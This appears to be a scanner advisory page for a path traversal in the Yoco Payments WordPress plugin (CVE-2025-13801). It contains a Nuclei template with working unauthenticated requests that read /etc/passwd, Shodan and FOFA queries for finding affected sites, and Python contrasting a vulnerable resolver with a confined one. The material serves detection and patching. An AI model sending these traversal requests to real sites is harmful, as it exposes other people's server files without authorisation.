Yoco Payments <= 3.8.8 - Path Traversal

CVE-2025-13801
Verified

Description

The Yoco Payments WordPress plugin, in versions up to and including 3.8.8, does not properly validate the file parameter of its yoco/logs REST endpoint (reachable via /wp-json/yoco/logs or ?rest_route=/yoco/logs). An unauthenticated attacker can supply ../ sequences in that parameter to traverse out of the intended directory and read arbitrary files on the server, such as /etc/passwd.

Severity

High

CVSS Score

7.5

Published Date

April 23, 2026

Template Author

0x_akoko

CVE-2025-13801.yaml
id: CVE-2025-13801

info:
  name: Yoco Payments <= 3.8.8 - Path Traversal
  author: 0x_Akoko
  severity: high
  description: |
   Yoco Payments WordPress plugin <= 3.8.8 contains a path traversal caused by improper validation of the file parameter, letting unauthenticated attackers read arbitrary files on the server.
  impact: |
   Unauthenticated attackers can read sensitive files on the server, potentially exposing confidential information.
  remediation: |
   Update to the latest version beyond 3.8.8.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="yoco-payment-gateway"
    shodan-query: http.html:"yoco-payment-gateway"
  tags: wordpress,wp-plugin,yoco,lfi,path-traversal,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/yoco-payment-gateway/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "=== Yoco Payments ===", "Stable tag:")
          - compare_versions(plugin_version, '<= 3.8.8')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: plugin_version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/yoco/logs?file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /?rest_route=/yoco/logs&file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - regex('root:[x*]?:0:0:', body)
        condition: and
# digest: 4a0a00473045022005c44ce1a56374026c3bbf615772e5ffb6e12021931bcc171a313875793b1302022100ebd22bb6d1d0bd71e58a53fa8d85892ad61b70453c737a85e66b6f7da1122019:922c64590222798bb761d5b6d8e72950
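The following Python is an added worked example, not code from the Yoco Payments plugin and not part of the Nuclei template above. It models both halves of this page offline: the template's two-stage decision (gate on the readme.txt Stable tag being <= 3.8.8, then confirm the traversal by matching a passwd root entry), and a hypothetical log-download resolver that shows why the template's file parameter payload escapes a naive join and how a confined resolver rejects it. The plugin's real PHP handler is not shown on this page, so the log directory layout, the resolver functions and the sample responses are assumptions constructed for illustration.

```python
import os
import re

# Values taken from the template above.
STABLE_TAG_RE = re.compile(r"(?m)Stable tag:\s*([0-9.]+)")
PASSWD_ROOT_RE = re.compile(r"root:[x*]?:0:0:")
MAX_VULNERABLE = (3, 8, 8)
PAYLOAD = "../../plugins/yoco-payment-gateway/../../../../../../etc/passwd"

# Constructed sample responses (not captured from a real site).
SAMPLE_README = (
    "=== Yoco Payments ===\n"
    "Contributors: yoco\n"
    "Requires at least: 5.6\n"
    "Stable tag: 3.8.8\n"
)
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def extract_stable_tag(readme_body):
    """Return the Stable tag as a tuple of ints (e.g. (3, 8, 8)), or None."""
    m = STABLE_TAG_RE.search(readme_body)
    if not m:
        return None
    parts = [p for p in m.group(1).split(".") if p]
    return tuple(int(p) for p in parts) if parts else None


def version_gate(readme_body):
    """Stage 1 of the template: readme reachable and Stable tag <= 3.8.8."""
    if "=== Yoco Payments ===" not in readme_body or "Stable tag:" not in readme_body:
        return False
    version = extract_stable_tag(readme_body)
    return version is not None and version <= MAX_VULNERABLE


def traversal_confirmed(status_code, body):
    """Stage 2 of the template: 200 response whose body holds a passwd root entry."""
    return status_code == 200 and PASSWD_ROOT_RE.search(body) is not None


def decide(readme_body, status_code, body):
    """Mirror `flow: http(1) && http(2)`: flag only when both stages pass."""
    return version_gate(readme_body) and traversal_confirmed(status_code, body)


def resolve_naive(log_dir, file_param):
    """Hypothetical vulnerable resolver (assumed, not the plugin's real code):
    joins the untrusted parameter onto the log directory and normalises it,
    so '..' segments walk out of log_dir."""
    return os.path.normpath(os.path.join(log_dir, file_param))


def resolve_confined(log_dir, file_param):
    """Hardened resolver: accept only a bare file name, canonicalise the
    result, and require it to stay inside the canonical log directory.
    Returns the resolved path, or None when the request must be rejected."""
    if not file_param or os.path.basename(file_param) != file_param or file_param in (".", ".."):
        return None
    base = os.path.realpath(log_dir)
    target = os.path.realpath(os.path.join(base, file_param))
    # realpath follows symlinks, so a link planted inside log_dir that points
    # elsewhere is also caught by the containment check below.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def check_param(log_dir, file_param):
    """Report what each resolver would open for one value of the file parameter."""
    confined = resolve_confined(log_dir, file_param)
    return {
        "naive": resolve_naive(log_dir, file_param),
        "confined_accepted": confined is not None,
    }


if __name__ == "__main__":
    log_dir = "/srv/wp/wp-content/uploads/yoco"  # assumed layout for illustration
    print("template verdict:", decide(SAMPLE_README, 200, SAMPLE_PASSWD))
    for param in ("gateway.log", PAYLOAD):
        print(param, "->", check_param(log_dir, param))
```

The naive resolver maps the payload to /etc/passwd whatever the depth of the assumed log directory, because normpath drops surplus .. segments at the filesystem root; the confined resolver never reaches the filesystem for that input, since anything containing a directory separator fails the bare-file-name check before canonicalisation.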
CVSS Metrics

Score:
7.5
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE ID:
CWE-22

Remediation Steps

Update the Yoco Payments plugin to a release later than 3.8.8. The installed version can be confirmed from the Stable tag line in /wp-content/plugins/yoco-payment-gateway/readme.txt, which is the same check the template's first request performs.